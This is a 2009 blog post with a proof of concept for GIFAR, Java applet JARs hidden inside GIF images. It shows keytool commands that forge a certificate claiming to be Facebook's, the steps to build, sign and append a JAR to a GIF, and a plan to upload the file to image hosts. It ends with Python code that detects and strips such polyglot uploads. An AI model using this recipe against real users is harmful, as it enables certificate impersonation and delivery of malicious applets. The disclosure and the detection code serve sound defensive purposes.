Thursday, May 7, 2009

GIFAR fixed in jdk6u13 [POC with signed Jars]


Here's a GIFAR (applet JARs hidden in GIF images) proof of concept with signed applets.

If you do not understand how signed applets work, please update your Java to the latest version (6u13 as of this writing, which is safe from GIFAR).

Get the latest Java version from java.com

Also, never accept untrusted Java certificates like the one shown above.



What is a signed applet? It is just an applet with an RSA certificate attached to identify the source of the applet. It is also special in the sense that it can access system files, commands, network ports etc. on the client side. While an unsigned applet can only steal your domain-specific cookies, a signed applet can FTP the whole cookies folder from your machine to an evil site, or worse, download and execute binaries (read: keylogger, spambot, virus, backdoors) from the internet.

Since it is very easy to create a fake certificate and cheap to buy a real one from VeriSign or Thawte, it is always a good idea not to accept any certificates. You might also want to remove installed certificates from your Java settings.

Now to the fun part (creating a fake certificate to sign a dangerous applet... Muhahahahah!!!)

It is easy to create and sign applets with fake certificates. Just use the following to create a key that claims to be Facebook's:
$ keytool -genkey -keyalg rsa -alias facebook
Enter keystore password:
What is your first and last name?
[Unknown]: Mark
What is the name of your organizational unit?
[Unknown]: Zuckerberg
What is the name of your organization?
[Unknown]: Facebook, Inc.
What is the name of your City or Locality?
[Unknown]: Dublin
What is the name of your State or Province?
[Unknown]: Ireland

What is the two-letter country code for this unit?
[Unknown]: IR
Is CN=Mark, OU=Zuckerberg, O="Facebook, Inc.", L=Dublin, ST=Ireland, C=IR correct?
[no]: yes

Enter key password for
(RETURN if same as keystore password):

After that, export the certificate:
$ keytool -export -alias facebook -file Facebook2008RSA.cert
Enter keystore password:
Certificate stored in file
Now one can write some applet code in a Java file named helloWorld.java, which accesses the browser's cookies directory on the client system (::evil:: to steal all secrets). Use the commands below to build, pack, sign and append to a GIF file to create a GIFAR.
$ javac helloworld.java

$ jar cvf helloworld.jar helloworld.class
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/MANIFEST.MF (in=56) (out=56) (stored 0%)
adding: helloworld.class (in=2637) (out=1442) (deflated 45%)
Total:
------
(in = 2681) (out = 1826) (deflated 31%)


$ jarsigner helloworld.jar appsec
Enter Passphrase for keystore:

Warning:
The signer certificate will expire within six months.

$ cat media.gif helloworld.jar > gifar.gif

Now just upload the GIFAR image and the certificate to any site that allows image uploads (say Blogger or Facebook) and call the applet with the image URL as the archive. The certificate loads from the origin where the GIFAR is hosted (e.g. facebook), which makes it very likely that someone will accept the certificate, resulting in complete PAWNAGE.

Notice that the certificate dialog shows port 8080, while the applet is launched from port 8081. Also, it is supposedly published by Facebook, Inc.

Download the image here

This GIFAR vector is fixed in JDK 6u13. I'd say that is reason enough to update. The latest Java version fails to load GIFARs from the internet, which is a good thing. But it still does not say that the applet was being read from a GIFAR JAR. Also, local applets still work from GIFAR files.
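The fix in 6u13 protects the client, but an image host (the "site that allows image uploads" above) can also refuse to serve a GIFAR in the first place. A GIFAR works because a GIF reader stops at the trailer byte while a ZIP reader starts from the End Of Central Directory record at the end of the file, so a file can satisfy both. The following is an added example, not code from the original post: it walks the GIF block structure to find where the image logically ends, checks whether the same bytes also open as a ZIP/JAR, and truncates the upload to the image's logical end. The one-pixel GIF, the two-member archive and the function names are all constructed here for illustration.

```python
import io
import zipfile

# Constructed sample: a well-formed 1x1 GIF89a (35 bytes). Layout:
# header, logical screen descriptor (global colour table flag set, 2 entries),
# colour table, image descriptor, LZW min code size, one data sub-block, trailer.
MINIMAL_GIF = (
    b"GIF89a"                                   # header
    + b"\x01\x00\x01\x00" + b"\x80\x00\x00"      # logical screen descriptor
    + b"\x00\x00\x00\xff\xff\xff"                # global colour table (black, white)
    + b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor
    + b"\x02" + b"\x02\x44\x01" + b"\x00"        # LZW code size, sub-block, terminator
    + b"\x3b"                                    # trailer
)

EOCD_SIG = b"PK\x05\x06"


def build_jar_bytes():
    """Constructed stand-in for helloworld.jar: a manifest plus a fake class file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("helloworld.class", b"\xca\xfe\xba\xbe" + b"\x00" * 12)
    return buf.getvalue()


# Same construction as `cat media.gif helloworld.jar > gifar.gif` in the post.
GIFAR_SAMPLE = MINIMAL_GIF + build_jar_bytes()


def _skip_sub_blocks(data, pos):
    """Advance past a chain of length-prefixed sub-blocks ending in a 0 byte."""
    while pos < len(data):
        size = data[pos]
        pos += 1
        if size == 0:
            return pos
        pos += size
    return None


def gif_logical_end(data):
    """Return the offset just past the GIF trailer (0x3B), or None if malformed.

    This is where a GIF decoder stops reading; anything after it is payload
    the image format does not account for.
    """
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    packed = data[10]
    pos = 13
    if packed & 0x80:                       # global colour table present
        pos += 3 * (2 << (packed & 0x07))   # 2^(N+1) RGB entries
    while pos is not None and pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:                   # trailer: logical end of image
            return pos
        if block == 0x21:                   # extension: label byte + sub-blocks
            pos = _skip_sub_blocks(data, pos + 1)
        elif block == 0x2C:                 # image descriptor
            if pos + 9 > len(data):
                return None
            ipacked = data[pos + 8]
            pos += 9
            if ipacked & 0x80:              # local colour table present
                pos += 3 * (2 << (ipacked & 0x07))
            pos = _skip_sub_blocks(data, pos + 1)   # +1 skips LZW min code size
        else:
            return None
    return None


def embedded_archive_members(data):
    """Return member names if the bytes also parse as a ZIP/JAR, else None.

    zipfile locates the EOCD record by scanning back from the end of the file
    and rebases member offsets on it, so leading image bytes do not stop it.
    That is the same behaviour the JVM's JAR loader showed before 6u13.
    """
    if data.rfind(EOCD_SIG, max(0, len(data) - 65557)) == -1:
        return None
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return zf.namelist()
    except zipfile.BadZipFile:
        return None


def inspect_image_upload(data):
    """Server-side verdict for an uploaded GIF: reject polyglots and trailing data."""
    end = gif_logical_end(data)
    members = embedded_archive_members(data)
    return {
        "well_formed_gif": end is not None,
        "trailing_bytes": None if end is None else len(data) - end,
        "archive_members": members,
        "reject": end is None or members is not None or len(data) > end,
    }


def strip_trailing_payload(data):
    """Mitigation: keep only the bytes a GIF decoder would read."""
    end = gif_logical_end(data)
    if end is None:
        raise ValueError("not a well-formed GIF")
    return data[:end]


if __name__ == "__main__":
    print(inspect_image_upload(GIFAR_SAMPLE))
    print(inspect_image_upload(strip_trailing_payload(GIFAR_SAMPLE)))
```

Rejecting any bytes past the logical end is stricter than only checking for a ZIP signature, and that is deliberate: the same concatenation trick works for other container formats, and a clean image has no reason to carry trailing data. Re-encoding uploaded images through an image library achieves the same effect for formats this small parser does not cover.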
